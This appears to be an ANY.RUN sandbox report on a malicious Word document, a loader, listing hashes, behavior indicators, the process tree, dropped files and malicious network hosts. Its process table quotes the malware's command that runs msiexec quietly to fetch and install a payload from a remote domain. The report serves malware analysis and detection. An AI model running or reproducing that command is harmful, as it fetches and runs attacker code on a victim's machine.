Malware analysis 253692618.doc Malicious activity | ANY.RUN

Add for printing

File name:	253692618.doc
Full analysis:	https://app.any.run/tasks/fb47188f-9eef-469e-bd0e-f072d9fac277
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Malware Trends Tracker >>>
Analysis date:	December 14, 2018, 10:48:47
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	exe-to-msi loader
Indicators:
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: -535, Title: Documento criado na verso anterior do Microsoft Office Word, Author: 1, Template: Normal.dot, Last Saved By: Microsoft Office, Revision Number: 118, Name of Creating Application: Microsoft Office Word, Total Editing Time: 06:20:00, Create Time/Date: Fri Nov 30 13:20:00 2018, Last Saved Time/Date: Wed Dec 12 13:22:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:	A7194D55E60CBFA69A5B31D039182882
SHA1:	E8F830A2F946AB23E153E67B6BDD1D4F41AB0FB7
SHA256:	56097C4FD04AD9ACF45F9964494B0FCAC33B0911E7A27B925E98E3444989AF0C
SSDEEP:	1536:11yrgDuz4O4wDAVN4Q08WX+7f7kUpZVlkO3aDlliJe:11yrgDuMOlMLTgaVlZqDlSe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 60 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: off
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (68.0.3440.106)
Google Update Helper (1.3.33.17)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Uses Microsoft Installer as loader
  - cmd.exe (PID: 2784)
- Starts CMD.EXE for commands execution
  - WINWORD.EXE (PID: 3468)
- Unusual execution from Microsoft Office
  - WINWORD.EXE (PID: 3468)
- Downloads executable files from the Internet
  - msiexec.exe (PID: 2912)
- Loads dropped or rewritten executable
  - rundll32.exe (PID: 2436)
SUSPICIOUS
- Executable content was dropped or overwritten
  - msiexec.exe (PID: 2912)
  - MSIB79E.tmp (PID: 2752)
- Executes scripts
  - MSIB79E.tmp (PID: 2752)
- Drop ExeToMSI Application
  - msiexec.exe (PID: 2912)
- Starts CMD.EXE for commands execution
  - wscript.exe (PID: 3744)
- Uses RUNDLL32.EXE to load library
  - cmd.exe (PID: 3648)
INFO
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 3468)
- Creates files in the user directory
  - WINWORD.EXE (PID: 3468)
- Starts application with an unusual extension
  - msiexec.exe (PID: 2912)
- Writes to a desktop.ini file (may be used to cloak folders)
  - msiexec.exe (PID: 2912)
- Application was dropped or rewritten from another process
  - MSIB79E.tmp (PID: 2752)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (80)

EXIF

FlashPix

Title:	Documento criado na versão anterior do Microsoft Office Word
Subject:	-
Author:	1
Keywords:	-
Comments:	-
Template:	Normal.dot
LastModifiedBy:	Microsoft Office
RevisionNumber:	118
Software:	Microsoft Office Word
TotalEditTime:	6.3 hours
CreateDate:	2018:11:30 13:20:00
ModifyDate:	2018:12:12 13:22:00
Pages:	1
Words:	2
Characters:	13
Security:	None
CodePage:	Unicode (UTF-8)
Company:	-
Lines:	1
Paragraphs:	1
CharCountWithSpaces:	14
AppVersion:	11.9999
ScaleCrop:	No
LinksUpToDate:	No
SharedDoc:	No
HyperlinksChanged:	No
TitleOfParts:	Documento criado na versão anterior do Microsoft Office Word
HeadingPairs:	Название 1
CompObjUserTypeLen:	31
CompObjUserType:	???????? Microsoft Office Word

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3468	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\253692618.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2784	"C:\Windows\System32\cmd.exe" /c msiexec.exe next=back error=shutdown /i http://office365onlinehome.com/host32 /q OnChange="c:\windows\system32" Aciqy=VIk¶µ±s1	C:\Windows\System32\cmd.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1612	msiexec.exe next=back error=shutdown /i http://office365onlinehome.com/host32 /q OnChange="c:\windows\system32" Aciqy=VIk¶µ±s1	C:\Windows\system32\msiexec.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255)
2912	C:\Windows\system32\msiexec.exe /V	C:\Windows\system32\msiexec.exe		services.exe
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255)
2752	"C:\Windows\Installer\MSIB79E.tmp"	C:\Windows\Installer\MSIB79E.tmp		msiexec.exe
User: admin Company: ratata company Integrity Level: MEDIUM Description: ratata Application Exit code: 0 Version: 1.2.3
3744	"wscript" "C:\Users\admin\AppData\Local\Temp\sdw.vbs"	C:\Windows\system32\wscript.exe	—	MSIB79E.tmp
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385
3648	"C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\zxa.bat	C:\Windows\System32\cmd.exe	—	wscript.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2436	rundll32.exe C:\Users\admin\AppData\Local\Temp\helpobj.dat, main	C:\Windows\system32\rundll32.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

1 425

Read events

999

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3468	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVRA8E5.tmp.cvr		—
		MD5:—	SHA256:—
3468	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~DFA0F453BB790D7BE0.TMP		—
		MD5:—	SHA256:—
3468	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~DFCFD7CB5143C9199C.TMP		—
		MD5:—	SHA256:—
3468	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~DF22F822413846C237.TMP		—
		MD5:—	SHA256:—
2912	msiexec.exe	C:\Users\admin\AppData\Local\Temp\~DF9572C5C7FE240646.TMP		—
		MD5:—	SHA256:—
2752	MSIB79E.tmp	C:\Users\admin\AppData\Local\Temp\nsyB878.tmp\System.dll		—
		MD5:—	SHA256:—
3468	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:C9005899C42F58E9E7C96DCB3A5EE8E3	SHA256:BAAA4B86601B2CDBDAF8C9D3F3076A6A57EBB0E5FFD49CF53E039A90105750E4
2752	MSIB79E.tmp	C:\Users\admin\AppData\Local\Temp\nsiB819.tmp		—
		MD5:—	SHA256:—
2912	msiexec.exe	C:\Config.Msi\13b693.rbs		—
		MD5:—	SHA256:—
2912	msiexec.exe	C:\Users\admin\AppData\Local\Temp\~DF09429DD970AED850.TMP		—
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2912	msiexec.exe	GET	200	95.216.85.157:80	http://office365onlinehome.com/host32	DE	executable	404 Kb	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2436	rundll32.exe	37.252.9.68:443	afgdhjkrm.pw	—	DE	malicious
2912	msiexec.exe	95.216.85.157:80	office365onlinehome.com	Hetzner Online GmbH	DE	malicious

DNS requests

Domain	IP	Reputation
office365onlinehome.com	95.216.85.157	malicious
afgdhjkrm.pw	37.252.9.68	malicious

Threats

PID	Process	Class	Message
2912	msiexec.exe	A Network Trojan was detected	SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
2912	msiexec.exe	Misc activity	SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2912	msiexec.exe	Potential Corporate Privacy Violation	POLICY [PTsecurity] Executable application_x-msi Download

Add for printing

No debug info

General Info

253692618.doc

A7194D55E60CBFA69A5B31D039182882

E8F830A2F946AB23E153E67B6BDD1D4F41AB0FB7

56097C4FD04AD9ACF45F9964494B0FCAC33B0911E7A27B925E98E3444989AF0C

1536:11yrgDuz4O4wDAVN4Q08WX+7f7kUpZVlkO3aDlliJe:11yrgDuMOlMLTgaVlZqDlSe

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Uses Microsoft Installer as loader

Starts CMD.EXE for commands execution

Unusual execution from Microsoft Office

Downloads executable files from the Internet

Loads dropped or rewritten executable

SUSPICIOUS

Executable content was dropped or overwritten

Executes scripts

Drop ExeToMSI Application

Starts CMD.EXE for commands execution

Uses RUNDLL32.EXE to load library

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Starts application with an unusual extension

Writes to a desktop.ini file (may be used to cloak folders)

Application was dropped or rewritten from another process

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings